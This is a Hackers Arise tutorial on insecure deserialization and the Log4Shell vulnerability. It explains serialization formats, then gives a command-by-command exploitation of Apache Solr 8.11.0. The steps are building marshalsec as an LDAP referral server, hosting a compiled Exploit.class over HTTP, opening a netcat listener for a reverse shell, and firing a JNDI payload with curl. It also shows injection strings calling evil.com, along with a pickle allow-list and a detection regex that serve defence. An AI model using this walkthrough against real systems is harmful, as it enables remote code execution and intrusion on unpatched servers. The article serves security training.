The post Insecure De-serialization: Millions of Applications May Be Vulnerable first appeared on Hackers Arise.
Welcome back, rising cyberwarriors!
Insecure deserialization represents one of the most critical security vulnerabilities in modern software applications, ranking among OWASP’s Top 10 Web Application Security Risks (part of Software and Data Integrity Failures). This vulnerability occurs when applications deserialize untrusted data without proper validation, potentially allowing attackers to execute arbitrary code, manipulate application logic, or gain unauthorized system access.
The Apache Log4j vulnerability (CVE-2021-44228), discovered in December 2021, exemplifies the devastating impact of insecure deserialization. Known as “Log4Shell,” this zero-day vulnerability affected millions of applications worldwide, demonstrating how a seemingly innocuous logging library could become a gateway for remote code execution attacks.
This article explores the fundamental concepts of serialization and deserialization, examines the mechanisms behind insecure deserialization attacks, and analyzes how these principles manifested in the Log4j vulnerability.
Historical Context and Timeline
The concept of serialization has been integral to computing since the early days of distributed systems. However, the security implications of deserialization have evolved significantly over time:
Early Era (1990s-2000s):
- Serialization primarily used for data storage and inter-process communication
- Security considerations were minimal, focusing mainly on data integrity
- Limited awareness of deserialization as an attack vector
Recognition Phase (2000s-2010s):
- First documented deserialization attacks emerged
- Security researchers began identifying patterns in vulnerable implementations
- Platforms such as Java, Python, and .NET showed susceptibility to deserialization exploits
Modern Era (2010s-Present):
- Widespread adoption of serialization in web applications and microservices
- OWASP recognition of insecure deserialization as a top security risk (A8 in the 2017 Top 10)
- High-profile vulnerabilities in popular frameworks and libraries
Log4j Timeline:
- 2013: Log4j 2.0-beta9 released with JNDI lookup functionality
- November 24, 2021: Vulnerability disclosed privately to the Apache Software Foundation
- December 9, 2021: CVE-2021-44228 publicly disclosed
- December 10, 2021: Proof-of-concept exploits widely available
- December 2021: Multiple patches released (2.15.0, 2.16.0, 2.17.0)
- Ongoing: Continued discovery of related vulnerabilities and bypass techniques
Understanding Serialization and Deserialization
Serialization is the process of converting an object’s state into a format that can be stored, transmitted, or reconstructed later. This process enables applications to:
- Persist object states to disk or databases
- Transmit complex data structures over networks
- Cache application states for performance optimization
- Enable inter-process communication in distributed systems

During serialization, an object’s instance variables, class information, and metadata are encoded into a byte stream or text format. The serialized data contains instructions for reconstructing the original object, including class definitions, field values, and object relationships.
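As a rough illustration of the round trip, the sketch below serializes a small dictionary with Python's pickle and json modules and then rebuilds it. The `session` data is a made-up example, not something from a real application.

```python
import json
import pickle

# Hypothetical application state, used only for illustration.
session = {"user": "alice", "roles": ["admin", "dev"], "login_count": 3}

# Serialize: turn the in-memory object into bytes (pickle) or text (JSON).
pickled_bytes = pickle.dumps(session)
json_text = json.dumps(session)

# Deserialize: rebuild equivalent objects from the serialized forms.
restored_from_pickle = pickle.loads(pickled_bytes)
restored_from_json = json.loads(json_text)

print(type(pickled_bytes).__name__, type(json_text).__name__)
print(restored_from_pickle == session, restored_from_json == session)
```

Both formats restore this particular object, but the pickle stream also carries instructions for how to rebuild it, which is where the security difference comes from.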
Deserialization reverses the serialization process, reconstructing objects from their serialized representations. This involves:
- Data Parsing: Reading and interpreting the serialized format
- Class Loading: Instantiating the appropriate object classes
- State Reconstruction: Populating object fields with deserialized values
- Method Execution: Potentially triggering constructor methods or initialization code
The security risk emerges during this process when applications deserialize untrusted data without proper validation, allowing attackers to manipulate the deserialization process.
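To make the risk concrete, here is a minimal and deliberately harmless sketch using Python's pickle module. The class name `Innocent` is hypothetical, and the built-in `len` stands in for whatever callable an attacker would actually choose.

```python
import pickle


class Innocent:
    """Looks like a plain data holder, but controls how it is rebuilt."""

    def __reduce__(self):
        # pickle stores "call this callable with these arguments" in the stream.
        # A harmless built-in (len) stands in for an attacker's choice.
        return (len, ("attacker-chosen argument",))


payload = pickle.dumps(Innocent())

# The receiver only sees bytes. Loading them calls len(...) and returns its
# result instead of an Innocent instance.
result = pickle.loads(payload)
print(result)
```

The point of the sketch is that the serialized data, not the receiving application, decided which function ran during loading.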
Common Serialization Formats
Modern applications utilize various serialization formats, each with distinct characteristics and security implications:
Format | Type | Security Level | Performance | Human Readable | Schema Support |
---|---|---|---|---|---|
Java Native | Binary | Low | High | No | Implicit |
Protocol Buffers | Binary | High | Very High | No | Explicit |
JSON | Text | Medium | Medium | Yes | Optional |
XML | Text | Medium | Low | Yes | DTD/XSD |
YAML | Text | Low | Medium | Yes | Optional |
Apache Avro | Binary | High | High | No | Explicit |
Java Native Serialization:
- Uses Java’s built-in serialization mechanism
- Produces binary output with class metadata
- Highly vulnerable to deserialization attacks
- Common in enterprise Java applications
Protocol Buffers (protobuf):
- Google’s language-neutral serialization format
- Efficient binary encoding with schema definitions
- Generally safer due to strict schema validation
- Requires explicit field definitions
Apache Avro:
- Schema-based serialization system
- Supports schema evolution and compatibility
- Binary format with JSON schema definitions
- Used extensively in big data ecosystems
JSON (JavaScript Object Notation):
- Human-readable text format
- Language-independent data interchange
- Limited object type support
- Generally safer but still vulnerable in certain contexts
XML (eXtensible Markup Language):
- Structured markup language
- Supports complex hierarchical data
- Vulnerable to XML External Entity (XXE) attacks
- Requires careful parsing to prevent security issues
YAML (YAML Ain’t Markup Language):
- Human-readable data serialization standard
- Supports complex data structures
- Some parsers can instantiate arbitrary objects or execute code during deserialization (for example, PyYAML's yaml.load() with an unsafe loader)
- Requires careful configuration for security

While different programming languages use different keywords and functions for serialization, the underlying principle remains consistent. Whether it is Java, Python, .NET, or PHP, each language implements serialization in a way that accommodates the features and security measures of its environment.
Serialization in PHP involves converting data structures or objects into a string format for storage or transfer, and then reconstructing them later. PHP uses the built-in serialize() function to create this string representation and unserialize() to revert it back. These functions work on arrays, objects, and scalar types but exclude resources and some internal objects. Serialized data includes metadata about types and values, preserving the state of objects including class information. PHP allows customization of serialization in classes via magic methods such as __serialize() and __unserialize(), which are the recommended approach since PHP 7.4, replacing older methods like __sleep() and __wakeup().

Python handles serialization primarily with the pickle module, which can serialize nearly any Python object, including custom classes, into a binary format; this is reversed by pickle.load(). For simpler or language-independent serialization, Python also offers the json module, which converts between JSON strings and Python dictionaries or lists.
Language | Built-in Serialization | Common Customization | JSON Support |
---|---|---|---|
PHP | serialize() / unserialize() | Magic methods (__sleep, __wakeup, __serialize, __unserialize) | json_encode() / json_decode() |
Python | pickle.dump() / pickle.load() | Custom class methods and third-party libraries | json.dumps() / json.loads() |
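When pickle cannot be avoided, one commonly documented hardening step is to restrict which globals the unpickler may resolve. The sketch below follows the pattern described in the Python pickle documentation; the allow-list contents and the helper name `restricted_loads` are illustrative assumptions, not a complete defense.

```python
import builtins
import io
import pickle

# Illustrative allow-list: only these built-in names may be resolved.
SAFE_BUILTINS = {"range", "complex", "set", "frozenset", "slice"}


class RestrictedUnpickler(pickle.Unpickler):
    def find_class(self, module, name):
        # Called whenever the stream asks for a global (class or function).
        if module == "builtins" and name in SAFE_BUILTINS:
            return getattr(builtins, name)
        # Everything else is rejected before it can be called.
        raise pickle.UnpicklingError(f"global '{module}.{name}' is forbidden")


def restricted_loads(data: bytes):
    """Like pickle.loads(), but refuses globals outside the allow-list."""
    return RestrictedUnpickler(io.BytesIO(data)).load()


# Plain data and allow-listed types still load.
print(restricted_loads(pickle.dumps([1, 2, range(3)])))

# A stream that tries to reach os.system is refused instead of executed.
try:
    restricted_loads(b"cos\nsystem\n(S'echo hello world'\ntR.")
except pickle.UnpicklingError as err:
    print("blocked:", err)
```

For data that crosses a trust boundary, a format such as JSON with explicit validation is usually the simpler choice; the allow-list approach is a fallback when the format cannot be changed.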
The Log4j Case
Now that we have covered the basics of serialization, we are ready to move on to the Log4j vulnerability.
Log4j is a Java-based logging framework broadly used in enterprise and cloud applications. Its core function is to append events, messages, and context into logs. With the introduction of JNDI (Java Naming and Directory Interface) lookup functionality in Log4j 2, log messages could reference external resources using special patterns, such as ${jndi:ldap://server/path}.
When Log4j encountered such a lookup in a log message (for example, if an attacker sent it in an HTTP User-Agent or another field that the application logs), the framework would perform a JNDI lookup. If the referenced server was under attacker control, the result could be malicious Java code—serialized as remote objects or stubs—being sent back to the application. Upon receipt, the JVM would deserialize this data, potentially triggering remote code execution.
In classic insecure deserialization, an attacker manipulates serialized data to inject malicious objects or payloads. In Log4j, the exploit chain worked as follows:
- Attacker injects ${jndi:ldap://evil.com/a} into any input logged by Log4j.
- Log4j parses the log event and initiates a JNDI lookup.
- The attacker’s LDAP server responds with a reference to a remote Java class (serialized code).
- The application fetches and loads this code, executing it, thus granting the attacker arbitrary code execution.
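From the defender's side, the first step of this chain leaves a recognizable marker in logged input. The following is a minimal detection sketch; the function name `contains_jndi_lookup` is hypothetical, and the pattern only matches the plain form of the lookup, so nested variants such as ${${lower:j}ndi:...} will slip past it.

```python
import re

# Matches the literal start of a JNDI lookup, case-insensitively.
# Assumption: only the plain, unobfuscated form is of interest here.
JNDI_LOOKUP = re.compile(r"\$\{jndi:", re.IGNORECASE)


def contains_jndi_lookup(value: str) -> bool:
    """Return True if the string contains a plain ${jndi: lookup prefix."""
    return JNDI_LOOKUP.search(value) is not None


# Example header values as they might appear in an access log.
samples = [
    "Mozilla/5.0 (X11; Linux x86_64)",
    "${jndi:ldap://evil.com/a}",
    "${JNDI:LDAP://evil.com/a}",
    "${${lower:j}ndi:ldap://evil.com/a}",  # obfuscated form, not detected
]
for sample in samples:
    print(contains_jndi_lookup(sample), sample)
```

A check like this is useful for triaging logs, but it is not a substitute for upgrading Log4j, precisely because of the obfuscated forms it misses.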
Reconnaissance
The sheer danger of this vulnerability stems from how ubiquitous the logging package is. Millions of applications, as well as software providers, use Log4j as a dependency in their own code.
For this example, I’ll demonstrate the vulnerability on Apache Solr 8.11.0, which is one example of software known to include this vulnerable Log4j package.
To begin, start with basic reconnaissance to identify which ports are open on the system and what is running on port 8983 in this case.
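If a full port scanner is not at hand, a single TCP connection attempt is enough to confirm whether the Solr port answers. This is a minimal sketch using Python's socket module; the helper name `is_port_open` is hypothetical, and it should only be pointed at a lab system you are authorized to test.

```python
import socket


def is_port_open(host: str, port: int, timeout: float = 2.0) -> bool:
    """Return True if a TCP connection to host:port succeeds within timeout."""
    try:
        # create_connection performs the TCP handshake; success means a
        # service is listening on that port.
        with socket.create_connection((host, port), timeout=timeout):
            return True
    except OSError:
        # Covers refused connections, timeouts, and unreachable hosts.
        return False
```

Calling is_port_open("IP", 8983) with the target's address in place of IP reports whether the Solr port accepts connections. It does not identify the service or its version, which still requires a scanner or a manual request.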


Exploitation
We’re going to use a free, publicly available tool to set up something called an “LDAP Referral Server.” This server’s job is to take the victim’s first request and send it somewhere else.
Here’s how it works step-by-step:
- The victim’s system tries to connect using something like ${jndi:ldap://attackerserver:1389/Resource}, which contacts our LDAP Referral Server.
- The LDAP Referral Server then forwards this request to another location, like http://attackerserver/resource.
- The victim’s system goes to that second location and downloads code from there.
- That code runs on the victim’s machine.
The initial LDAP request can’t deliver the actual malicious code directly — it’s more like a pointer or referral telling the victim’s system where to go next. The LDAP Referral Server acts as a middleman that sends the victim to an HTTP server where the real payload (the malicious code) is hosted. This allows us to deliver and run more complex or larger code that can’t be included in the first LDAP request alone.
To do all this, we need an HTTP server running (on port 8000 or similar) to host and serve that code.
Step 1: Install Java
The first step is to obtain the LDAP Referral Server. We will use the marshalsec utility, available at https://github.com/mbechler/marshalsec. It requires Java to run, and version 8 is recommended.
We can download it from the Oracle archive: https://www.oracle.com/java/technologies/javase/javase8-archive-downloads.html

Run the following commands to configure your system to use this Java version by default:
kali> sudo mkdir -p /usr/lib/jvm
kali> cd /usr/lib/jvm
kali> sudo tar xzvf ~/Downloads/jdk-8u181-linux-x64.tar.gz
kali> sudo update-alternatives --install "/usr/bin/java" "java" "/usr/lib/jvm/jdk1.8.0_181/bin/java" 1
kali> sudo update-alternatives --install "/usr/bin/javac" "javac" "/usr/lib/jvm/jdk1.8.0_181/bin/javac" 1
kali> sudo update-alternatives --install "/usr/bin/javaws" "javaws" "/usr/lib/jvm/jdk1.8.0_181/bin/javaws" 1
kali> sudo update-alternatives --set java /usr/lib/jvm/jdk1.8.0_181/bin/java
kali> sudo update-alternatives --set javac /usr/lib/jvm/jdk1.8.0_181/bin/javac
kali> sudo update-alternatives --set javaws /usr/lib/jvm/jdk1.8.0_181/bin/javaws
Then, check the version:
kali> java -version

Step 2: Download marshalsec
The simplest approach is to download the repository from GitHub:
kali> git clone https://github.com/mbechler/marshalsec
kali> cd marshalsec
Next, we need to build marshalsec with Maven, the Java build tool:
kali> sudo apt install maven
kali> mvn clean package -DskipTests

With the marshalsec utility built, we can start an LDAP referral server to direct connections to our secondary HTTP server (which we will prepare later). The syntax to start the LDAP server is as follows:
kali> java -cp target/marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://IP:Port/#Exploit"

Now that our LDAP server is ready and waiting, we can open a second terminal window to prepare our final payload and set up a secondary HTTP server.
Ultimately, the Log4j vulnerability will execute arbitrary code that you craft in the Java programming language. In this example, we will retrieve a reverse-shell connection to gain control over the target machine.
Create a new file named Exploit.java:

Next, we need to compile this payload with:
kali> javac Exploit.java -source 8 -target 8

The compiler printed a warning in my case; you might not see it yourself. It appears because I have multiple versions of Java installed. Regardless, the Exploit.class file was created successfully.
With the payload now created and compiled, we can start a temporary HTTP server.
kali> python3 -m http.server

Next, we’re ready to prepare a netcat listener:
kali> nc -lnvp port

Finally, all that is left to do is trigger the exploit and fire off our JNDI syntax:
kali> curl 'http://IP:8983/solr/admin/cores?foo=$\{jndi:ldap://IP:1389/Exploit\}'

And we’ve achieved RCE!
Summary
Insecure deserialization is a serious and common problem in modern software. The Log4j “Log4Shell” vulnerability shows how processing untrusted data without careful validation can lead to remote code execution attacks that affect systems worldwide. The lesson is that any part of software that reads, constructs, or runs code from external input must be carefully validated and protected.
For those interested in improving their cybersecurity skills, especially in understanding and defending against complex vulnerabilities like insecure de-serialization, Hackers-Arise offers expert-led training programs. Check it out!
Source: HackersArise
Source Link: https://hackers-arise.com/insecure-de-serialization-millions-of-applications-may-be-vulnerable/